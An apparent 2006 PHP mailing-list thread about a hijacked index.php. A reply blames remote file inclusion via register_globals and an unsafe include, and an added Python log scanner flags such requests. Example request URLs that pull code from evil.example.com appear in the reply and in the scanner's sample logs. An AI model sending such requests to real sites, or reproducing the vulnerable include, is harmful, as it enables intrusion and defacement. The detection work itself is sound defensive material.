On 11/13/06, tedd <tedd@xxxxxxxxxxxx> wrote:
Hi gang:

While this is not an obvious php question, it does deal with security, which is a concern.

Just this morning I had a couple of my sites "hijacked". What I found was someone had replaced my root level index.php with their own index.php.

You can see the result at: http://xn--u2g.com/index1.php

It was not a terrible loss nor inconvenience, but I wonder how they did it.

Any ideas how this was done and suggestions as to how to prevent this from happening again?

Thanks,

tedd

--
-------
http://sperling.com http://ancientstones.com http://earthstones.com

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Tedd,

I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable.

In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this:

include($path .'script.php');

How embarrassing.

If you have access to your server logs, look for URLs such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
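Added example, not part of the original thread or either poster's code: a Python scan of web server access logs for the kind of request described in the reply above, where a query parameter's value is itself a URL. It goes slightly beyond the post by also catching percent-encoded and double-encoded values and other stream wrappers (https, ftp, php, data); the log lines, the cart.php script and the path parameter are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request portion of a common/combined-format access log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Parameter values that begin with a stream wrapper PHP's include() can read from.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftps?|php|data)\s*:', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) for up to max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_include_attempts(lines):
    """Return (ip, path, param, value, status) for each suspicious parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        parts = urlsplit(m.group("target"))
        # parse_qsl performs the first round of percent-decoding.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(value)
            if REMOTE_VALUE_RE.match(value):
                hits.append((m.group("ip"), parts.path, name, value,
                             int(m.group("status"))))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Nov/2006:08:01:12 -0500] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Nov/2006:08:02:40 -0500] "GET /exploited.php?action=http://evil.example.com/inject.txt HTTP/1.0" 200 312',
    '198.51.100.7 - - [13/Nov/2006:08:02:44 -0500] "GET /cart.php?path=%2568ttp%253A%2F%2Fevil.example.com%2Finject.txt%3F HTTP/1.0" 404 210',
    '192.0.2.33 - - [13/Nov/2006:08:05:00 -0500] "GET /search.php?q=http+proxy+setup HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, path, param, value, status in find_remote_include_attempts(SAMPLE_LOG):
        print(f"{ip} {path} param={param!r} value={value!r} status={status}")
```

A hit only shows that the request was made, not that the include succeeded, and legitimate parameters that carry URLs (redirect targets, for instance) will also match, so each hit should be checked against the script it was sent to.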